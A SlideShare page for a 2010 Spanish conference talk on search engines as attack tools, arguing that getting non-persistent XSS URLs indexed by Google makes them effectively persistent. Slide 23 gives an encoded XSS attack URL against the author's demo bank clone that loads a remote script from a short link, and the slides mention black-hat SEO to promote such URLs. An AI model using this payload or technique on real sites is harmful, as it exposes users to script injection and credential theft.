Ataques XSS Google Persistentes
Chema Alonso
Buscadores como Arma
Búsqueda de información
Búsqueda de
vulnerabilidades
Distribución de malware
Ejecución de comando...
Búsqueda de información
Búsqueda de passwords
Distribución de malware en Apple.com
BrowserShots
Caché de ataques SQL
Servicios de PING
Análisis Forense
XSS Persistentes
 Se inyectan en el repositorio de datos de la
aplicación
 Bases de datos
 Correos Web
 Tienen cierto ...
XSS No Persistentes
¿Cómo se descubren?
 Pentesting
 Acunetix free-edition
 El blog de Eduardo Abril
 Just Googling
FBI y sus XSS
NASA y XSS
Dominio .mil
Oracle
Google
«Last-minute» XSS
Scripts de Búsqueda
The Facts
 Google Indexa URLs con XSS
 Un alto porcentaje de usuarios llega por buscadores
The Facts…
 Bueno… «buscadores means Google»
Conclusión
 Se puede dar de alta una URL con un XSS no
persistente
 Servicio de alta de URLs
 Enlazado en una web index...
Bank Of Maligno
 Web «copia» de Bank of América
 XSS No Persistente en search.aspx
 URL de ataque:
 http://bankofmalig...
Bank Of Maligno
Bank Of Maligno
Bank Of Maligno
Conclusiones
 No hay filtrado de URLs
 Ataques SQL Injection
 Ataques XSS
 Indexar un XSS en Google (u otro buscador) ...
¿Preguntas?
 Chema Alonso
 chema@informatica64.com
 http://twitter.com/chemaalonso
 http://www.informatica64.com
 Blo...
Upcoming SlideShare
Loading in …5
×

Ataques XSS Google Persistentes

1,202 views

Published on

Charla impartida por Chema Alonso de la empresa Informática 64, para el evento "Asegura IT Camp2" que tuvo lugar los días 22, 23 y 24 de Octubre de 2010 en El Escorial.

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,202
On SlideShare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
64
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Ataques XSS Google Persistentes

  1. 1. Ataques XSS Google Persistentes Chema Alonso
  2. 2. Buscadores como Arma Búsqueda de información Búsqueda de vulnerabilidades Distribución de malware Ejecución de comandos Ataques XSS
  3. 3. Búsqueda de información
  4. 4. Búsqueda de passwords
  5. 5. Distribución de malware en Apple.com
  6. 6. BrowserShots
  7. 7. Caché de ataques SQL
  8. 8. Servicios de PING
  9. 9. Análisis Forense
  10. 10. XSS Persistentes  Se inyectan en el repositorio de datos de la aplicación  Bases de datos  Correos Web  Tienen cierto nivel de complejidad  Tienen que ocultarse a los ojos de los administradores  Están en los datos  Pueden tener consecuencias inesperadas
  11. 11. XSS No Persistentes
  12. 12. ¿Cómo se descubren?  Pentesting  Acunetix free-edition  El blog de Eduardo Abril  Just Googling
  13. 13. FBI y sus XSS
  14. 14. NASA y XSS
  15. 15. Dominio .mil
  16. 16. Oracle
  17. 17. Google
  18. 18. «Last-minute» XSS
  19. 19. Scripts de Búsqueda
  20. 20. The Facts  Google Indexa URLs con XSS  Un alto porcentaje de usuarios llega por buscadores
  21. 21. The Facts…  Bueno… «buscadores means Google»
  22. 22. Conclusión  Se puede dar de alta una URL con un XSS no persistente  Servicio de alta de URLs  Enlazado en una web indexada  Se puede posicionar con técnicas Black SEO
  23. 23. Bank Of Maligno  Web «copia» de Bank of América  XSS No Persistente en search.aspx  URL de ataque:  http://bankofmaligno.informatica64.com/search.aspx?S= %22%68%6F%6C%61%3C%73%63%72%69%70%74% 20%66%6F%72%3D%77%69%6E%64%6F%77%20%65 %76%65%6E%74%3D%6F%6E%6C%6F%61%64%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%62 %69%74%2E%6C%79%2F%64%63%73%65%4E%49% 22%3E%3C%2F%73%63%72%69%70%74%3E  Dada de alta en Google & Bing manualmente  Dada de alta en Blog «Un informático en el lado del mal»
  24. 24. Bank Of Maligno
  25. 25. Bank Of Maligno
  26. 26. Bank Of Maligno
  27. 27. Conclusiones  No hay filtrado de URLs  Ataques SQL Injection  Ataques XSS  Indexar un XSS en Google (u otro buscador) es convertirlo en un % Persistente  Protección SEO + Protección robots.txt
  28. 28. ¿Preguntas?  Chema Alonso  chema@informatica64.com  http://twitter.com/chemaalonso  http://www.informatica64.com  Blogs  http://www.elladodelmal.com  http://www.windowstecnico.com  http://www.seguridadapple.com  http://www.forefront-es.com  http://www.puntocompartido.com/blogshare  http://www.exchangespain.com

×